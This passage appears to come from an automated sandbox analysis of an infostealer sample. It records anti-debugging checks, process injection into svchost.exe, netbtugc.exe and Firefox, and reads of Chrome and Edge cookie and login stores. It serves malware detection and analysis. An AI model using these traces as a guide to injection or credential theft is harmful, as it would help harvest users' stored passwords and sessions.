            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03028918 mov eax, dword ptr fs:[00000030h] | 1_2_03028918
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03028918 mov eax, dword ptr fs:[00000030h] | 1_2_03028918
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B892A mov eax, dword ptr fs:[00000030h] | 1_2_030B892A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030C892B mov eax, dword ptr fs:[00000030h] | 1_2_030C892B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B0946 mov eax, dword ptr fs:[00000030h] | 1_2_030B0946
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03104940 mov eax, dword ptr fs:[00000030h] | 1_2_03104940
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03056962 mov eax, dword ptr fs:[00000030h] | 1_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03056962 mov eax, dword ptr fs:[00000030h] | 1_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03056962 mov eax, dword ptr fs:[00000030h] | 1_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307096E mov eax, dword ptr fs:[00000030h] | 1_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307096E mov edx, dword ptr fs:[00000030h] | 1_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307096E mov eax, dword ptr fs:[00000030h] | 1_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030D4978 mov eax, dword ptr fs:[00000030h] | 1_2_030D4978
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030D4978 mov eax, dword ptr fs:[00000030h] | 1_2_030D4978
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030BC97C mov eax, dword ptr fs:[00000030h] | 1_2_030BC97C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h] | 1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h] | 1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h] | 1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h] | 1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h] | 1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h] | 1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h] | 1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h] | 1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h] | 1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h] | 1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h] | 1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h] | 1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h] | 1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030309AD mov eax, dword ptr fs:[00000030h] | 1_2_030309AD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030309AD mov eax, dword ptr fs:[00000030h] | 1_2_030309AD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B89B3 mov esi, dword ptr fs:[00000030h] | 1_2_030B89B3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B89B3 mov eax, dword ptr fs:[00000030h] | 1_2_030B89B3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B89B3 mov eax, dword ptr fs:[00000030h] | 1_2_030B89B3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030C69C0 mov eax, dword ptr fs:[00000030h] | 1_2_030C69C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030649D0 mov eax, dword ptr fs:[00000030h] | 1_2_030649D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FA9D3 mov eax, dword ptr fs:[00000030h] | 1_2_030FA9D3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030BE9E0 mov eax, dword ptr fs:[00000030h] | 1_2_030BE9E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030629F9 mov eax, dword ptr fs:[00000030h] | 1_2_030629F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030629F9 mov eax, dword ptr fs:[00000030h] | 1_2_030629F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030BC810 mov eax, dword ptr fs:[00000030h] | 1_2_030BC810
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03052835 mov eax, dword ptr fs:[00000030h] | 1_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03052835 mov eax, dword ptr fs:[00000030h] | 1_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03052835 mov eax, dword ptr fs:[00000030h] | 1_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03052835 mov ecx, dword ptr fs:[00000030h] | 1_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03052835 mov eax, dword ptr fs:[00000030h] | 1_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03052835 mov eax, dword ptr fs:[00000030h] | 1_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0306A830 mov eax, dword ptr fs:[00000030h] | 1_2_0306A830
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030D483A mov eax, dword ptr fs:[00000030h] | 1_2_030D483A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030D483A mov eax, dword ptr fs:[00000030h] | 1_2_030D483A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03042840 mov ecx, dword ptr fs:[00000030h] | 1_2_03042840
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock | 0_2_004238DA
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0041F250 SetUnhandledExceptionFilter | 0_2_0041F250
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 0_2_0041A208
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Thread register set: target process: 1804
            Source: C:\Windows\SysWOW64\netbtugc.exe | Thread APC queued: target process: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 25F8008
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_00436CD7 LogonUserW | 0_2_00436CD7
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW | 0_2_0040D590
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput | 0_2_00434418
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event | 0_2_0043333C
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe"
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity | 0_2_00446124
            Source: CITA#U00c7#U00c3O.exe, DJonRIGNYjBRZ.exe, 00000005.00000002.4152464556.0000000000D20000.00000002.00000001.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000005.00000000.1913786779.0000000000D21000.00000002.00000001.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000000.2069872570.00000000019B1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: DJonRIGNYjBRZ.exe, 00000005.00000002.4152464556.0000000000D20000.00000002.00000001.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000005.00000000.1913786779.0000000000D21000.00000002.00000001.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000000.2069872570.00000000019B1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: DJonRIGNYjBRZ.exe, 00000005.00000002.4152464556.0000000000D20000.00000002.00000001.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000005.00000000.1913786779.0000000000D21000.00000002.00000001.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000000.2069872570.00000000019B1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: DJonRIGNYjBRZ.exe, 00000005.00000002.4152464556.0000000000D20000.00000002.00000001.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000005.00000000.1913786779.0000000000D21000.00000002.00000001.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000000.2069872570.00000000019B1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
            Source: CITA#U00c7#U00c3O.exe | Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW | 0_2_004720DB
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_00472C3F GetUserNameW | 0_2_00472C3F
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte | 0_2_0041E364
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary | 0_2_0040E500

            Stealing of Sensitive Information

            Source: Yara match | File source: 1.2.svchost.exe.2670000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.4151245699.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4152977911.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4152890125.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2006339526.0000000007BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2001885118.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4152933454.00000000041F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2002697433.0000000005290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: CITA#U00c7#U00c3O.exe | Binary or memory string: WIN_XP
            Source: CITA#U00c7#U00c3O.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: CITA#U00c7#U00c3O.exe | Binary or memory string: WIN_XPe
